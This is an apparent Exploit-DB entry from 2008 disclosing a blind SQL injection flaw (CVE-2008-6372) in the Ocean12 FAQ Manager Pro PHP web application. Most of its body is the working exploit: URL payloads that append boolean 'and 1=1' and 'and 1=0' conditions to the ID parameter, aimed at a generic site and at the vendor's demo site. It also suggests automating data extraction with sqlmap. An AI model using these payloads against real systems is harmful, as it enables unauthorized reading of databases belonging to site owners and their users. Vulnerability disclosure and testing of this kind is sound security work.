Ocean12 FAQ Manager Pro ID Blind SQL Injection Vulnerabillity

2008-11-28T00:00:00
ID EDB-ID:7271
Type exploitdb
Reporter Stack
Modified 2008-11-28T00:00:00

Description

Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity. CVE-2008-6372. Webapps exploit for php platform

                                        
                                            #########################################################
---------------------------------------------------------
Portal Name: Ocean12 FAQ Manager Pro
Author : Mountassif Moad
 Evil Finger / v4 Team
Vulnerability : Blind Sql Injection
---------------------------------------------------------
#########################################################
Exploit :
site.com/?Action=Cat&ID=40%20and%201=1 true
site.com/?Action=Cat&ID=40%20and%201=0 false
Demo :
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false

# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

# milw0rm.com [2008-11-28]